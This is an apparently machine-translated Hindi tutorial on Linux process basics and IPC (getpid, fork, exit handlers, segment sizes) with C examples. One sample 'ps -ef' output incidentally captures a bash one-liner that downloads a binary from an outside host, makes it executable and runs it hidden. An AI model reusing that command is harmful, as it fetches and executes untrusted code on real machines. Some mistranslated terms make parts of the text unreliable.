इंटर प्रोसेस कम्युनिकेशन - क्विक गाइड

इंटर प्रोसेस कम्युनिकेशन (IPC) एक ऐसा तंत्र है जिसमें एक प्रक्रिया का संचार दूसरी प्रक्रिया के साथ होता है। यह आमतौर पर केवल एक प्रणाली में होता है।

संचार दो प्रकार के हो सकते हैं -

  • संबंधित प्रक्रियाओं के बीच केवल एक प्रक्रिया से शुरू करना, जैसे कि माता-पिता और बच्चे की प्रक्रिया।

  • असंबंधित प्रक्रियाओं, या दो या अधिक विभिन्न प्रक्रियाओं के बीच।

इस विषय पर आगे बढ़ने से पहले कुछ महत्वपूर्ण शब्द निम्नलिखित हैं, जिन्हें हमें जानना आवश्यक है।

Pipes- दो संबंधित प्रक्रियाओं के बीच संचार। तंत्र आधा द्वैध है जिसका अर्थ है पहली प्रक्रिया दूसरी प्रक्रिया के साथ संचार करती है। एक पूर्ण द्वैध प्राप्त करने के लिए यानी, दूसरी प्रक्रिया के लिए पहली प्रक्रिया के साथ संवाद करने के लिए एक और पाइप की आवश्यकता होती है।

FIFO- दो असंबंधित प्रक्रियाओं के बीच संचार। एफआईएफओ एक पूर्ण द्वैध है, जिसका अर्थ है कि पहली प्रक्रिया एक ही समय में दूसरी प्रक्रिया और इसके विपरीत के साथ संवाद कर सकती है।

Message Queues- पूर्ण द्वैध क्षमता के साथ दो या अधिक प्रक्रियाओं के बीच संचार। प्रक्रियाएं संदेश पोस्ट करके और इसे कतार से बाहर निकालकर एक दूसरे के साथ संवाद करेंगी। एक बार पुनर्प्राप्त करने के बाद, संदेश कतार में उपलब्ध नहीं है।

Shared Memory- दो या दो से अधिक प्रक्रियाओं के बीच संचार सभी प्रक्रियाओं के बीच स्मृति के एक साझा टुकड़े के माध्यम से प्राप्त किया जाता है। साझा मेमोरी को सभी प्रक्रियाओं तक पहुंच को सिंक्रनाइज़ करके एक दूसरे से संरक्षित करने की आवश्यकता है।

Semaphores- सेमीफोरर्स कई प्रक्रियाओं तक पहुंच को सिंक्रनाइज़ करने के लिए हैं। जब एक प्रक्रिया मेमोरी (पढ़ने या लिखने के लिए) का उपयोग करना चाहती है, तो इसे लॉक (या संरक्षित) और एक्सेस हटाए जाने पर रिलीज़ करने की आवश्यकता होती है। डेटा को सुरक्षित करने के लिए सभी प्रक्रियाओं को दोहराया जाना चाहिए।

Signals- सिग्नल सिग्नलिंग के माध्यम से कई प्रक्रियाओं के बीच संचार का एक तंत्र है। इसका मतलब है कि एक स्रोत प्रक्रिया एक संकेत (संख्या द्वारा मान्यता प्राप्त) भेज देगी और गंतव्य प्रक्रिया तदनुसार इसे संभाल लेगी।

Note - इस ट्यूटोरियल के लगभग सभी प्रोग्राम लिनक्स ऑपरेटिंग सिस्टम (उबंटू में निष्पादित) के तहत सिस्टम कॉल पर आधारित हैं।

प्रक्रिया की जानकारी में जाने से पहले, हमें कुछ चीजें जानने की जरूरत है, जैसे कि -

एक प्रक्रिया क्या है? एक प्रक्रिया निष्पादन में एक कार्यक्रम है।

एक कार्यक्रम क्या है? एक प्रोग्राम एक फाइल है जिसमें किसी प्रक्रिया की जानकारी होती है और रन टाइम के दौरान इसे कैसे बनाया जाता है। जब आप प्रोग्राम का निष्पादन शुरू करते हैं, तो यह रैम में लोड हो जाता है और निष्पादित करना शुरू कर देता है।

प्रत्येक प्रक्रिया की पहचान एक अद्वितीय सकारात्मक पूर्णांक के रूप में की जाती है जिसे प्रक्रिया आईडी या बस पीआईडी ​​(प्रक्रिया पहचान संख्या) कहा जाता है। कर्नेल आमतौर पर प्रक्रिया आईडी को 32767 तक सीमित करता है, जो विन्यास योग्य है। जब प्रक्रिया आईडी इस सीमा तक पहुंच जाती है, तो इसे फिर से रीसेट किया जाता है, जो सिस्टम प्रक्रियाओं की सीमा के बाद होता है। उस काउंटर से अप्रयुक्त प्रक्रिया आईडी को फिर नई बनाई गई प्रक्रियाओं को सौंपा जाता है।

सिस्टम कॉल गेटपिड () कॉलिंग प्रक्रिया की प्रक्रिया आईडी देता है।

#include <sys/types.h>
#include <unistd.h>

pid_t getpid(void);

यह कॉल कॉलिंग प्रक्रिया की प्रक्रिया आईडी देता है जो अद्वितीय होने की गारंटी है। यह कॉल हमेशा सफल होता है और इस प्रकार त्रुटि को इंगित करने के लिए कोई वापसी मूल्य नहीं होता है।

प्रत्येक प्रक्रिया की अपनी विशिष्ट आईडी होती है जिसे प्रोसेस आईडी कहा जाता है जो ठीक है लेकिन इसे किसने बनाया है? इसके निर्माता के बारे में जानकारी कैसे प्राप्त करें? निर्माता प्रक्रिया को मूल प्रक्रिया कहा जाता है। गेटपिड () कॉल के माध्यम से पेरेंट आईडी या पीपीआईडी ​​प्राप्त की जा सकती है।

सिस्टम कॉल गेटपीड () कॉलिंग प्रक्रिया के जनक पीआईडी ​​लौटाता है।

#include <sys/types.h>
#include <unistd.h>

pid_t getppid(void);

यह कॉल कॉलिंग प्रक्रिया की मूल प्रक्रिया ID लौटाती है। यह कॉल हमेशा सफल होता है और इस प्रकार त्रुटि को इंगित करने के लिए कोई वापसी मूल्य नहीं होता है।

इसे एक सरल उदाहरण से समझते हैं।

निम्नलिखित कॉलिंग प्रक्रिया के पीआईडी ​​और पीपीआईडी ​​को जानने का एक कार्यक्रम है।

File name: processinfo.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   int mypid, myppid;
   printf("Program to know PID and PPID's information\n");
   mypid = getpid();
   myppid = getppid();
   printf("My process ID is %d\n", mypid);
   printf("My parent process ID is %d\n", myppid);
   printf("Cross verification of pid's by executing process commands on shell\n");
   system("ps -ef");
   return 0;
}

उपरोक्त कार्यक्रम के संकलन और निष्पादन पर, निम्नलिखित आउटपुट होगा।

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0  2017 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0  2017 ?        00:06:06 /usr/libexec/mysqld 
                                         --basedir = /usr 
                                         --datadir = /var/lib/mysql 
                                         --plugin-dir = /usr/lib64/mysql/plugin 
                                         --user = mysql 
                                         --log-error = /var/log/mariadb/mariadb.log 
                                         --pid-file = /run/mariadb/mariadb.pid 
                                         --socket = /var/lib/mysql/mysql.sock
2868535   96284      0  0 05:23 ?        00:00:00 bash -c download() { 
                                         flag = "false" hsize = 1 
                                         echo -e "GET /$2 HTTP/1.1\nHost: $1\nConnection: close\n\n" | 
                                         openssl s_client -timeout -quiet 
                                         -verify_quiet -connect $1:443 2> /dev/null | tee out | while read line do if [[ "$flag" == "false" ]]     
                                         then 
                                         hsize = $((hsize+$(echo $line | wc -c))) fi if [[ "${line:1:1}" == "" ]]     
                                         then flag = "true"
                                         fi 
                                         echo $hsize > size done tail -c +$(cat size) out > 
                                         $2 rm size out }
                                         ( download my.mixtape.moe mhawum 2>
                                         /dev/null chmod +x mhawum 2>
                                         /dev/null ./mhawum >
                                         /dev/null 2>
                                         /dev/null )&
2868535   96910  96284 99 05:23 ?        00:47:26 ./mhawum
6118874  104116      0  3 05:25 ?        00:00:00 sh -c cd /home/cg/root/6118874; 
                                         timeout 10s javac Puppy.java
6118874  104122 104116  0 05:25 ?        00:00:00 timeout 10s javac Puppy.java
6118874  104123 104122 23 05:25 ?        00:00:00 javac Puppy.java
3787205  104169      0  0 05:25 ?        00:00:00 sh -c cd /home/cg/root/3787205; 
                                         timeout 10s main
3787205  104175 104169  0 05:25 ?        00:00:00 timeout 10s main
3787205  104176 104175  0 05:25 ?        00:00:00 main
3787205  104177 104176  0 05:25 ?        00:00:00 ps -ef
Program to know PID and PPID's information
My process ID is 104176
My parent process ID is 104175
Cross verification of pid's by executing process commands on shell

Note- "C" लाइब्रेरी फंक्शन सिस्टम () शेल कमांड को निष्पादित करता है। सिस्टम को दी गई दलीलें () शेल पर निष्पादित कमांड हैं। उपरोक्त कार्यक्रम में, कमांड "पीएस" है, जो प्रक्रिया की स्थिति देता है।

सभी चल रही प्रक्रियाओं और सिस्टम संबंधी अन्य जानकारी के बारे में पूरी जानकारी खरीद फाइल सिस्टम से उपलब्ध है।

अब जब हमने देखा है कि प्रक्रिया की मूल जानकारी और इसकी मूल प्रक्रिया को कैसे प्राप्त किया जाए, यह प्रक्रिया / कार्यक्रम की जानकारी के विवरण को देखने का समय है।

वास्तव में प्रक्रिया छवि क्या है? प्रोग्राम को निष्पादित करते समय प्रक्रिया छवि एक निष्पादन योग्य फ़ाइल है। इस छवि में आमतौर पर निम्नलिखित अनुभाग हैं -

  • कोड खंड या पाठ खंड
  • डेटा खंड
  • ढेर खंड
  • ढेर खंड

निम्नलिखित प्रक्रिया छवि का सचित्र प्रतिनिधित्व है।

Code segmentऑब्जेक्ट फ़ाइल या प्रोग्राम के वर्चुअल एड्रेस स्पेस का एक हिस्सा है जिसमें निष्पादन योग्य निर्देश होते हैं। यह आमतौर पर रीड-ओनली डेटा सेगमेंट होता है और इसका एक निश्चित आकार होता है।

डेटा खंड दो प्रकार के होते हैं।

  • Initialized
  • Un-initialized

Initialized data segment ऑब्जेक्ट फ़ाइल या प्रोग्राम के वर्चुअल एड्रेस स्पेस का एक हिस्सा है जिसमें इनिशियलाइज़ स्टैटिक और ग्लोबल वैरिएबल्स होते हैं।

Un-initialized data segmentऑब्जेक्ट फ़ाइल या प्रोग्राम के वर्चुअल एड्रेस स्पेस का एक हिस्सा है जिसमें अनइंस्टाल्यूटिक स्टेटिक और ग्लोबल वेरिएबल्स होते हैं। अन-इनिशियलाइज्ड डेटा सेगमेंट को BSS (सिंबल द्वारा शुरू किया गया ब्लॉक) सेगमेंट भी कहा जाता है।

Data segmentरन-टाइम के दौरान चरों के मूल्यों को बदला जा सकता है। इस खंड का एक निश्चित आकार भी है।

Stack segmentस्वचालित चर और फ़ंक्शन मापदंडों के लिए आवंटित स्मृति का एक क्षेत्र है। यह फ़ंक्शन कॉल निष्पादित करते समय एक वापसी पता भी संग्रहीत करता है। स्टैक स्थानीय या स्वचालित चर, फ़ंक्शन मापदंडों और अगले पते या वापसी पते को संग्रहीत करने के लिए LIFO (लास्ट-इन-फर्स्ट-आउट) तंत्र का उपयोग करता है। वापसी पता फ़ंक्शन निष्पादन के पूरा होने के बाद लौटने के लिए पते को संदर्भित करता है। यह खंड आकार स्थानीय चर, फ़ंक्शन मापदंडों और फ़ंक्शन कॉल के अनुसार परिवर्तनशील है। यह खंड एक उच्च पते से निचले पते तक बढ़ता है।

Heap segmentमैलोडोक () और कॉलॉक () कॉल के लिए डायनेमिक मेमोरी स्टोरेज के लिए आवंटित मेमोरी का क्षेत्र है। उपयोगकर्ता के आवंटन के अनुसार इस खंड का आकार भी परिवर्तनशील है। यह खंड निम्न पते से उच्च पते तक बढ़ता है।

आइए अब हम जांचते हैं कि कुछ सैंपल प्रोग्राम के साथ सेगमेंट (डेटा और bss सेगमेंट) का आकार कैसे बदलता है। खंड आकार को "आकार" कमांड निष्पादित करके जाना जाता है।

प्रारंभिक कार्यक्रम

फ़ाइल: सेगमेंट_साइज़ 1 सी

#include<stdio.h>

int main() {
   printf("Hello World\n");
   return 0;
}

निम्न प्रोग्राम में, एक अनइंस्टाल्यूटेड स्टेटिक वैरिएबल जोड़ा जाता है। इसका मतलब यह है कि असिंचित खंड (BSS) का आकार 4 बाइट्स से बढ़ेगा।Note- लिनक्स ऑपरेटिंग सिस्टम में, int का आकार 4 बाइट्स है। पूर्णांक डेटा प्रकार का आकार संकलक और ऑपरेटिंग सिस्टम समर्थन पर निर्भर करता है।

फ़ाइल: सेगमेंट_साइज़ 2 सी

#include<stdio.h>

int main() {
   static int mystaticint1;
   printf("Hello World\n");
   return 0;
}

निम्न प्रोग्राम में, एक प्रारंभिक स्थिर वैरिएबल जोड़ा जाता है। इसका अर्थ है कि आरंभिक खंड (DATA) का आकार 4 बाइट्स से बढ़ेगा।

फ़ाइल: सेगमेंट_साइज़ 3 सी

#include<stdio.h>

int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

निम्नलिखित प्रोग्राम में, एक आरंभिक वैश्विक चर जोड़ा जाता है। इसका अर्थ है कि आरंभिक खंड (DATA) का आकार 4 बाइट्स से बढ़ेगा।

फ़ाइल: सेगमेंट_साइज़ 4 सी

#include<stdio.h>

int myglobalint1 = 500;
int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

निम्नलिखित कार्यक्रम में, एक अनइंस्टाल्यूटेड ग्लोबल वैरिएबल जोड़ा जाता है। इसका मतलब यह है कि असिंचित खंड (BSS) का आकार 4 बाइट्स से बढ़ेगा।

फ़ाइल: सेगमेंट_साइज़ 5 सी

#include<stdio.h>

int myglobalint1 = 500;
int myglobalint2;
int main() {
   static int mystaticint1;
   static int mystaticint2 = 100;
   printf("Hello World\n");
   return 0;
}

निष्पादन के चरण

संकलन

babukrishnam $ gcc segment_size1.c -o segment_size1
babukrishnam $ gcc segment_size2.c -o segment_size2 babukrishnam $ gcc segment_size3.c -o segment_size3
babukrishnam $ gcc segment_size4.c -o segment_size4 babukrishnam $ gcc segment_size5.c -o segment_size5

निष्पादन / आउटपुट

babukrishnam size segment_size1 segment_size2 segment_size3 segment_size4 segment_size5
   text  data  bss  dec  hex  filename
   878   252    8   1138 472  segment_size1 
   878   252   12   1142 476  segment_size2 
   878   256   12   1146 47a  segment_size3 
   878   260   12   1150 47e  segment_size4 
   878   260   16   1154 482  segment_size5
babukrishnam

अब तक हम जानते हैं कि जब भी हम किसी कार्यक्रम को निष्पादित करते हैं तो एक प्रक्रिया बनाई जाती है और निष्पादन के पूरा होने के बाद समाप्त की जाएगी। क्या होगा अगर हमें कार्यक्रम के भीतर एक प्रक्रिया बनाने की आवश्यकता है और इसके लिए एक अलग कार्य शेड्यूल करना चाहता है। क्या इसे हासिल किया जा सकता है? हां, जाहिर तौर पर प्रक्रिया निर्माण के माध्यम से। बेशक, काम पूरा हो जाने के बाद यह अपने आप समाप्त हो जाएगा या आप इसे आवश्यकतानुसार समाप्त कर सकते हैं।

प्रक्रिया निर्माण के माध्यम से प्राप्त किया जाता है fork() system call। नव निर्मित प्रक्रिया को चाइल्ड प्रोसेस कहा जाता है और इसे शुरू करने वाली प्रक्रिया (या निष्पादन शुरू होने पर प्रक्रिया) को पेरेंट प्रक्रिया कहा जाता है। कांटा () सिस्टम कॉल के बाद, अब हमारे पास दो प्रक्रियाएं हैं - माता-पिता और बच्चे की प्रक्रिया। उन्हें कैसे अंतर करना है? बहुत सरल है, यह उनकी वापसी मूल्यों के माध्यम से है।

बच्चे की प्रक्रिया के निर्माण के बाद, हमें फोर्क () सिस्टम कॉल विवरण देखें।

#include <sys/types.h>
#include <unistd.h>

pid_t fork(void);

बच्चे की प्रक्रिया बनाता है। इस कॉल के बाद, दो प्रक्रियाएं होती हैं, मौजूदा एक को मूल प्रक्रिया कहा जाता है और नव निर्मित को बाल प्रक्रिया कहा जाता है।

कांटा () सिस्टम कॉल रिटर्न तीनों मानों में से एक है -

  • एक त्रुटि को इंगित करने के लिए नकारात्मक मूल्य, अर्थात, बच्चे की प्रक्रिया बनाने में असफल।

  • बाल प्रक्रिया के लिए एक शून्य देता है।

  • मूल प्रक्रिया के लिए सकारात्मक मान देता है। यह मान नव निर्मित चाइल्ड प्रक्रिया की प्रक्रिया आईडी है।

आइए हम एक सरल कार्यक्रम पर विचार करें।

File name: basicfork.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   fork();
   printf("Called fork() system call\n");
   return 0;
}

निष्पादन के चरण

संकलन

gcc basicfork.c -o basicfork

निष्पादन / आउटपुट

Called fork() system call
Called fork() system call

Note- आमतौर पर कांटा () कॉल के बाद, बच्चे की प्रक्रिया और माता-पिता की प्रक्रिया अलग-अलग कार्य करती है। यदि एक ही कार्य को चलाने की आवश्यकता है, तो प्रत्येक कांटा () कॉल के लिए इसे 2 पावर n बार चलाएंगे, जहांn कई बार कांटा () लगाया जाता है।

उपरोक्त मामले में, फोर्क () को एक बार कहा जाता है, इसलिए आउटपुट दो बार मुद्रित होता है (2 शक्ति 1)। यदि कांटा () कहा जाता है, तो 3 बार बोलें, फिर आउटपुट 8 बार (2 पावर 3) प्रिंट होगा। यदि इसे 5 बार कहा जाता है, तो यह 32 बार और इसी तरह और आगे प्रिंट करता है।

कांटा देखा () बच्चे की प्रक्रिया बनाते हैं, यह माता-पिता और बच्चे की प्रक्रियाओं का विवरण देखने का समय है।

फ़ाइल का नाम: pids_after_fork.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

int main() {
   pid_t pid, mypid, myppid;
   pid = getpid();
   printf("Before fork: Process id is %d\n", pid);
   pid = fork();

   if (pid < 0) {
      perror("fork() failure\n");
      return 1;
   }

   // Child process
   if (pid == 0) {
      printf("This is child process\n");
      mypid = getpid();
      myppid = getppid();
      printf("Process id is %d and PPID is %d\n", mypid, myppid);
   } else { // Parent process 
      sleep(2);
      printf("This is parent process\n");
      mypid = getpid();
      myppid = getppid();
      printf("Process id is %d and PPID is %d\n", mypid, myppid);
      printf("Newly created process id or child pid is %d\n", pid);
   }
   return 0;
}

संकलन और निष्पादन कदम

Before fork: Process id is 166629
This is child process
Process id is 166630 and PPID is 166629
Before fork: Process id is 166629
This is parent process
Process id is 166629 and PPID is 166628
Newly created process id or child pid is 166630

एक प्रक्रिया दो तरह से समाप्त हो सकती है -

  • असामान्य रूप से, कुछ संकेतों के वितरण पर होता है, कहते हैं संकेत को समाप्त करें।

  • सामान्यतया, _exit () सिस्टम कॉल (या _Exit () सिस्टम कॉल) या एक्जिट () लाइब्रेरी फ़ंक्शन का उपयोग करते हुए।

_Exit () और निकास () के बीच का अंतर मुख्य रूप से सफाई गतिविधि है। exit() नियंत्रण वापस कर्नेल में लौटने से पहले कुछ सफाई करता है, जबकि _exit() (या _Exit ()) नियंत्रण को वापस कर्नेल में तुरंत लौटा देगा।

बाहर निकलने के साथ निम्नलिखित उदाहरण कार्यक्रम पर विचार करें ()।

फ़ाइल का नाम: atexit_sample.c

#include <stdio.h>
#include <stdlib.h>

void exitfunc() {
   printf("Called cleanup function - exitfunc()\n");
   return;
}

int main() {
   atexit(exitfunc);
   printf("Hello, World!\n");
   exit (0);
}

संकलन और निष्पादन कदम

Hello, World!
Called cleanup function - exitfunc()

_Exit () के साथ निम्नलिखित उदाहरण कार्यक्रम पर विचार करें।

फ़ाइल नाम: at_exit_sample.c

#include <stdio.h>
#include <unistd.h>

void exitfunc() {
   printf("Called cleanup function - exitfunc()\n");
   return;
}

int main() {
   atexit(exitfunc);
   printf("Hello, World!\n");
   _exit (0);
}

संकलन और निष्पादन कदम

Hello, World!

जैसा कि हमने देखा है, जब भी हम कांटा का उपयोग करते हुए एक कार्यक्रम से एक बच्चे की प्रक्रिया बनाते हैं, तो निम्न होता है -

  • वर्तमान प्रक्रिया अब मूल प्रक्रिया बन जाती है
  • नई प्रक्रिया बाल प्रक्रिया बन जाती है

यदि माता-पिता की प्रक्रिया बच्चे की प्रक्रिया से जल्दी अपना कार्य पूरा कर लेती है और फिर छोड़ देती है या बाहर निकल जाती है तो क्या होता है? अब बाल प्रक्रिया का जनक कौन होगा? बाल प्रक्रिया का जनक init प्रक्रिया है, जो सभी कार्यों को आरंभ करने वाली पहली प्रक्रिया है।

बाल प्रक्रिया निष्पादन स्थिति की निगरानी करने के लिए, यह जांचने के लिए कि क्या बच्चा प्रक्रिया चल रही है या बंद हो गई है या निष्पादन की स्थिति की जांच करने के लिए, इत्यादि प्रतीक्षा () सिस्टम कॉल और इसके वेरिएंट का उपयोग किया जाता है।

आइए एक उदाहरण कार्यक्रम पर विचार करें, जहां माता-पिता की प्रक्रिया बच्चे की प्रक्रिया का इंतजार नहीं करती है, जिसके परिणामस्वरूप यह प्रक्रिया बच्चे की प्रक्रिया के लिए नए माता-पिता बन जाती है।

फ़ाइल का नाम: parentprocess_nowait.c

#include<stdio.h>

int main() {
   int pid;
   pid = fork();
   
   // Child process
   if (pid == 0) {
      system("ps -ef");
      sleep(10);
      system("ps -ef");
   } else {
      sleep(3);
   }
   return 0;
}

संकलन और निष्पादन कदम

UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:41 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:13:38 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
4688328   88138      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   88140      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   89353      0 99 Jan22 ?        2-07:35:14 /sbin/klogd -c 1 -x -x
5942779   91836      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328  125358      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  125359      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328  127456      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506  127457      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
8023807  163891      0  0 05:41 ?        00:00:00 main
8023807  164130      0  0 05:41 ?        00:00:00 sh -c cd /home/cg/root/8023807; timeout 10s main
8023807  164136 164130  0 05:41 ?        00:00:00 timeout 10s main
8023807  164137 164136  0 05:41 ?        00:00:00 main
8023807  164138 164137  0 05:41 ?        00:00:00 main
8023807  164139 164138  0 05:41 ?        00:00:00 ps -ef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan20 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
mysql       101      1  0 Jan20 ?        00:04:41 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --user=mysql --log-error=/var/log/mariadb/mariadb.log --pid-file=/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
3108506    5445      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328    5446      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   21894      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   21895      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
4688328   27309      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   27311      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
8295652   32407      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
4688328   49830      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
3108506   50854      0  0 Jan20 ?        00:00:18 /sbin/klogd -c 1 -x -x
4688328   64936      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
3108506   64937      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   67563      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
5942779   68128      0  0 Jan22 ?        00:00:07 /sbin/klogd -c 1 -x -x
3108506   68238      0  0 Jan22 ?        00:00:59 [/sbin/klogd -c ] <defunct>
4688328   68999      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
3108506   69212      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   74090      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
3108506   74091      0  0 Jan22 ?        00:00:00 [/sbin/klogd -c ] <defunct>
4688328   74298      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
3108506   74299      0  0 Jan22 ?        00:01:19 [/sbin/klogd -c ] <defunct>
6327201   74901      0  0 Jan20 ?        00:00:38 /sbin/klogd -c 1 -x -x
6327201   77274      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   78621      0  0 Jan20 ?        00:00:33 /sbin/klogd -c 1 -x -x
7528790   80536      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
6327201   80542      0  0 Jan20 ?        00:01:09 [/sbin/klogd -c ] <defunct>
4688328   82050      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
3108506   82051      0  0 Jan22 ?        00:01:59 [/sbin/klogd -c ] <defunct>
7528790   84116      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
7528790   84136      0 19 Jan20 ?        21:13:48 /sbin/klogd -c 1 -x -x
7528790   84140      0  0 Jan20 ?        00:00:28 /sbin/klogd -c 1 -x -x
3108506   84395      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84396      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84397      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
3108506   84928      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
4688328   84929      0  0 Jan22 ?        00:00:29 [/sbin/klogd -c ] <defunct>
5942779   84930      0  0 Jan22 ?        00:00:30 [/sbin/klogd -c ] <defunct>
7528790   84970      0  0 Jan20 ?        00:00:34 /sbin/klogd -c 1 -x -x
3108506   85787      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
4688328   85789      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86368      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   86402      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
5942779   87027      0  0 Jan22 ?        00:00:14 [/sbin/klogd -c ] <defunct>
7528790   87629      0  0 Jan20 ?        00:00:39 /sbin/klogd -c 1 -x -x
7528790   87719      0  0 Jan20 ?        00:00:27 /sbin/klogd -c 1 -x -x
